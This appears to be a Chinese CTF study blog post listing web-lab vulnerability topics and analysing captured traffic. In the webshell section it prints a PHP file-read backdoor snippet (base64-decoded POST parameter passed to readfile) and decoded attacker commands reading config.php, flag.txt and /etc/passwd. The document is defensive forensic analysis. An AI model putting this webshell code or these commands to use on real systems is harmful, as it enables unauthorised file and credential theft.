无标题
Web靶场漏洞
暴力破解
基于表单的暴力破解
验证码绕过(on server)
SQL注入
数字型注入
字符型注入
文件上传
MIME type
client check
流量分析
webshell流量分析
将过滤出来的六条数据包依次进行解码,解码获得的php代码中显示
$F = base64_decode(substr($_POST["t41ffbc5fb0c04"], 2));
@readfile($F);
即从 POST 参数中取出一个“被伪装过的文件路径”,还原成真实路径后,直接把这个文件的内容读出来并返回给攻击者,所以解码后获得攻击者完整攻击路径:
/var/www/html/config.php
/var/www/html/flag.txt
/var/www/html/
cd "/var/www/html";id;echo e124bc;pwd;echo 43523
cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523
tls流量分析
从中获取以下信息
TLSv1.2 Record Layer: Handshake Protocol: Client Hello
非TLS1.0/1.1,非明文,安全传输
Server Name: api.ctfhub.com
明确域名,合法HTTPS访问,非硬编码IP,为正常业务流量
Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b)
前向安全,AEAD模式,无弱算法,是现代加密套件
ALPN Next Protocol: h2
ALPN Next Protocol: http/1.1
支持HTTP/2,标准Web客户端行为,正常的SDK特征。
综上所述,为安全通信。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 小枝的博客!





































